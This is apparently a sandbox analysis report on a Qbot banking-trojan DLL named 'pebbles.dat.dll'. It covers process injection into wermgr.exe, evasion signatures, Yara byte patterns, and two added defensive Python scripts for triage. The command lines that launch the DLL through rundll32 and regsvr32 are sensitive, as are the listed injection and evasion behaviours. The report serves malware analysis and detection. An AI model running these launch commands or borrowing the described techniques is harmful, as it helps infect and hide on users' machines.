
Windows Analysis Report
pebbles.dat.dll

Overview

General Information

Sample Name:pebbles.dat.dll
Analysis ID:715156
MD5:d89521adaf6418e6ebe43b1a1a9d2af9
SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
Tags:dll

Detection

Qbot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Registers a DLL
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5328 cmdline: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5792 cmdline: rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 4884 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 5696 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
      • audiodg.exe (PID: 3472 cmdline: C:\Windows\system32\AUDIODG.EXE 0x2ac MD5: 0B245353F92DF527AA7613BA2C0DA023)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 612 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5360 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5580 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
Columns: Source | Rule | Description | Author | Strings

Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_Qbot_1; Description: Yara detected Qbot; Author: Joe Security
  Rule: Windows_Trojan_Qbot_92c67a6d; Description: unknown; Author: unknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
  Rule: Windows_Trojan_Qbot_3074a8d4; Description: unknown; Author: unknown
    • 0x1ca14:$a4: %u;%u;%u;
    • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1cdd8:$a6: %u&%s&%u
    • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Qbot_1; Description: Yara detected Qbot; Author: Joe Security
  Rule: Windows_Trojan_Qbot_92c67a6d; Description: unknown; Author: unknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
(28 entries in total; the remainder are not shown in this export)
Columns: Source | Rule | Description | Author | Strings

Source: 9.2.wermgr.exe.970000.0.raw.unpack
  Rule: JoeSecurity_Qbot_1; Description: Yara detected Qbot; Author: Joe Security
  Rule: Windows_Trojan_Qbot_92c67a6d; Description: unknown; Author: unknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
  Rule: Windows_Trojan_Qbot_3074a8d4; Description: unknown; Author: unknown
    • 0x1ca14:$a4: %u;%u;%u;
    • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1cdd8:$a6: %u&%s&%u
    • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
Source: 3.2.regsvr32.exe.990000.0.raw.unpack
  Rule: JoeSecurity_Qbot_1; Description: Yara detected Qbot; Author: Joe Security
  Rule: Windows_Trojan_Qbot_92c67a6d; Description: unknown; Author: unknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
(61 entries in total; the remainder are not shown in this export)
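The memory-dump identifiers in the Yara listings above encode where each match was found. The decoder below is an added example and not Joe Security code: the field layout is inferred from the identifiers on this page (`<proc index>.<phase>.<dump id>.<base>.<protect>.<?>.<type>.<?>.sdmp` and `<proc index>.<phase>.<image>.<base>.<n>[.raw].unpack`), the meaning of the phase digit (0 = taken at process start, 2 = at process end, 3 = intermediate) and of the two unlabelled fields is an assumption, and the protection and memory-type constants are the standard Win32 MEMORY_BASIC_INFORMATION values. The list of matching dumps is copied from this report's System Summary section, and the process-index-to-image mapping is read off the report's `.unpack` identifiers.

```python
"""Decode Joe Sandbox memory-dump identifiers and summarise where a Yara rule hit.

Added example, not Joe Security code. Field layout inferred from this report's
identifiers; PHASE meaning and the two unlabelled sdmp fields are assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
PHASE = {0: "start", 2: "end", 3: "intermediate"}  # assumption, see module docstring


@dataclass(frozen=True)
class Dump:
    proc_index: int
    phase: str
    base: int
    protect: Optional[str]   # .unpack identifiers carry no protection or type
    mem_type: Optional[str]
    image: Optional[str]     # only .unpack identifiers carry the process image


def parse_sdmp(name: str) -> Dump:
    """Parse '<idx>.<phase>.<dumpid>.<base>.<protect>.<?>.<type>.<?>.sdmp'."""
    f = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(f) != 8:
        raise ValueError(f"unexpected sdmp identifier: {name}")
    protect = int(f[4], 16) & 0xFF          # drop PAGE_GUARD / PAGE_NOCACHE modifier bits
    return Dump(int(f[0]), PHASE.get(int(f[1]), f[1]), int(f[3], 16),
                PAGE_PROTECT.get(protect, hex(protect)),
                MEM_TYPE.get(int(f[6], 16), f[6]), None)


def parse_unpack(name: str) -> Dump:
    """Parse '<idx>.<phase>.<image>.<base>.<n>[.raw].unpack' (image contains a dot)."""
    f = name.split(".")
    if f[-1] != "unpack":
        raise ValueError(f"unexpected unpack identifier: {name}")
    f = f[:-2] if f[-2] == "raw" else f[:-1]
    # f is now [idx, phase, *image parts, base, n]
    return Dump(int(f[0]), PHASE.get(int(f[1]), f[1]), int(f[-2], 16),
                None, None, ".".join(f[2:-2]))


# Memory-dump sources that matched Windows_Trojan_Qbot_92c67a6d, copied from the
# System Summary section of this report.
QBOT_MEMORY_MATCHES = [
    "00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp",
    "00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp",
    "00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp",
    "00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp",
    "00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp",
    "00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp",
    "00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp",
    "00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp",
    "00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp",
]
# Process index -> image, read off the report's .unpack identifiers (e.g. 9.2.wermgr.exe...).
IMAGES = {3: "regsvr32.exe", 4: "rundll32.exe", 5: "rundll32.exe",
          7: "wermgr.exe", 8: "wermgr.exe", 9: "wermgr.exe"}


def summarise(names: list[str]) -> dict[int, dict]:
    """Per process: image, phases in which a matching region existed, distinct regions,
    and whether any matching region was PAGE_EXECUTE_READWRITE."""
    per_proc: dict[int, dict] = {}
    for d in map(parse_sdmp, names):
        e = per_proc.setdefault(d.proc_index, {
            "image": IMAGES.get(d.proc_index, "?"), "phases": set(), "regions": set(), "rwx": False})
        e["phases"].add(d.phase)
        e["regions"].add((d.base, d.protect, d.mem_type))
        e["rwx"] = e["rwx"] or d.protect == "PAGE_EXECUTE_READWRITE"
    return per_proc


if __name__ == "__main__":
    for idx, e in sorted(summarise(QBOT_MEMORY_MATCHES).items()):
        print(f"{idx:>2} {e['image']:<13} phases={sorted(e['phases'])} "
              f"regions={len(e['regions'])} {'RWX' if e['rwx'] else ''}")
```

Run stand-alone it prints one line per process. Read next to the signature list (process created in suspended mode, memory allocated and written in foreign processes), the three wermgr.exe entries are the ones to note: under the phase assumption above, the Qbot payload is already present as executable memory when those processes start, which is what writing into a suspended child and then resuming it looks like; the regsvr32.exe and rundll32.exe hosts only hold it in intermediate and end-of-process dumps.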

          Data Obfuscation

          Source: Process started; Author: Joe Security
          Data:
            Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
            CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
            CommandLine|base64offset|contains: (empty)
            Image: C:\Windows\SysWOW64\cmd.exe
            NewProcessName: C:\Windows\SysWOW64\cmd.exe
            OriginalFileName: C:\Windows\SysWOW64\cmd.exe
            ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
            ParentImage: C:\Windows\System32\loaddll32.exe
            ParentProcessId: 5328
            ParentProcessName: loaddll32.exe
            ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
            ProcessId: 5900
            ProcessName: cmd.exe
          No Snort rule has matched
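The process tree and the Sigma hit above give enough to write a first-pass triage rule for process-creation telemetry. The code below is an added example and is not Joe Security's "Execute DLL with spoofed extension" rule, whose exact logic is not on this page. The event records are constructed from the PIDs, image paths and command lines listed in this report (the parent of loaddll32.exe is not on the page, so that event is left out, and one benign rundll32 line is constructed as a control); the extension sets and the rundll32/regsvr32 -> wermgr.exe heuristic are this example's own assumptions, the latter drawn from the fact that every DLL host in this tree that unpacked Qbot spawned a SysWOW64 wermgr.exe child in which the payload was then found.

```python
"""Heuristic triage of process-creation events from this report's process tree.

Added example, not Joe Security's Sigma rule. EVENTS are constructed from the
report's process tree; extension sets and the wermgr.exe heuristic are assumptions.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


SYS32, WOW64 = r"C:\Windows\System32", r"C:\Windows\SysWOW64"
EVENTS = [
    # Taken from the report's process tree
    ProcEvent(5864, SYS32 + r"\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", SYS32 + r"\loaddll32.exe"),
    ProcEvent(5900, WOW64 + r"\cmd.exe", r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1', SYS32 + r"\loaddll32.exe"),
    ProcEvent(5792, WOW64 + r"\rundll32.exe", r'rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1', WOW64 + r"\cmd.exe"),
    ProcEvent(4884, WOW64 + r"\wermgr.exe", r"C:\Windows\SysWOW64\wermgr.exe", WOW64 + r"\rundll32.exe"),
    ProcEvent(5696, WOW64 + r"\regsvr32.exe", r"regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll", SYS32 + r"\loaddll32.exe"),
    ProcEvent(3472, WOW64 + r"\wermgr.exe", r"C:\Windows\SysWOW64\wermgr.exe", WOW64 + r"\regsvr32.exe"),
    ProcEvent(5784, WOW64 + r"\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer", SYS32 + r"\loaddll32.exe"),
    ProcEvent(612, WOW64 + r"\wermgr.exe", r"C:\Windows\SysWOW64\wermgr.exe", WOW64 + r"\rundll32.exe"),
    ProcEvent(5360, WOW64 + r"\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer", SYS32 + r"\loaddll32.exe"),
    ProcEvent(5580, WOW64 + r"\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable", SYS32 + r"\loaddll32.exe"),
    # Constructed benign control, not from the report
    ProcEvent(9001, SYS32 + r"\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", SYS32 + r"\explorer.exe"),
]

DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
HOST_EXTS = {".dll", ".ocx", ".cpl", ".ax", ".drv"}            # assumption: what a DLL host normally loads
DECOY_EXTS = {"dat", "txt", "tmp", "log", "bin", "jpg", "png",  # assumption: inner extensions used as decoys
              "pdf", "doc", "docx", "xls", "xlsx"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.I)
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')                         # quoted path or bare token


def module_path(cmdline: str) -> Optional[str]:
    """Return the module a rundll32/regsvr32 command line loads, or None."""
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    for tok in tokens[1:]:                  # tokens[0] is the host executable itself
        if not tok or tok[0] in "/-,#":     # switches (/s) and stray ',#1' fragments
            continue
        return tok.split(",")[0]            # rundll32 appends ',Export' to the module path
    return None


def module_findings(path: str) -> list[str]:
    """Heuristics on the loaded module's name and location."""
    stem, ext = ntpath.splitext(ntpath.basename(path).lower())
    findings = []
    if ext not in HOST_EXTS:
        findings.append("non_dll_extension")
    inner = stem.rsplit(".", 1)[-1] if "." in stem else ""
    if inner in DECOY_EXTS:                 # e.g. pebbles.dat.dll
        findings.append("double_extension")
    if USER_WRITABLE.match(path):
        findings.append("user_writable_path")
    return findings


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map PID -> findings for every event that trips at least one heuristic."""
    out: dict[int, list[str]] = {}
    for ev in events:
        image = ntpath.basename(ev.image).lower()
        parent = ntpath.basename(ev.parent_image).lower()
        findings: list[str] = []
        if image in DLL_HOSTS:
            mod = module_path(ev.cmdline)
            if mod:
                findings += module_findings(mod)
        if parent in DLL_HOSTS and image == "wermgr.exe":   # pattern seen in this report's tree
            findings.append("dll_host_spawned_wermgr")
        if findings:
            out[ev.pid] = findings
    return out


if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, ", ".join(findings))
```

The check on the module name is deliberately split in two: the file here does end in `.dll`, so a rule that only tests the final extension would miss it, while the inner `.dat` is what makes the name a decoy. The wermgr.exe child check is specific to what this tree shows and should be read as a pivot for hunting rather than a general rule.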


          AV Detection

          Source: pebbles.dat.dllReversingLabs: Detection: 16%
          Source: pebbles.dat.dllJoe Sandbox ML: detected
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: pebbles.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.269410643.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.269325200.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.269366163.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099C123 FindFirstFileW,FindNextFileW,3_2_0099C123
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0445C123 FindFirstFileW,FindNextFileW,4_2_0445C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00995D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,3_2_00995D1E

          System Summary

          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
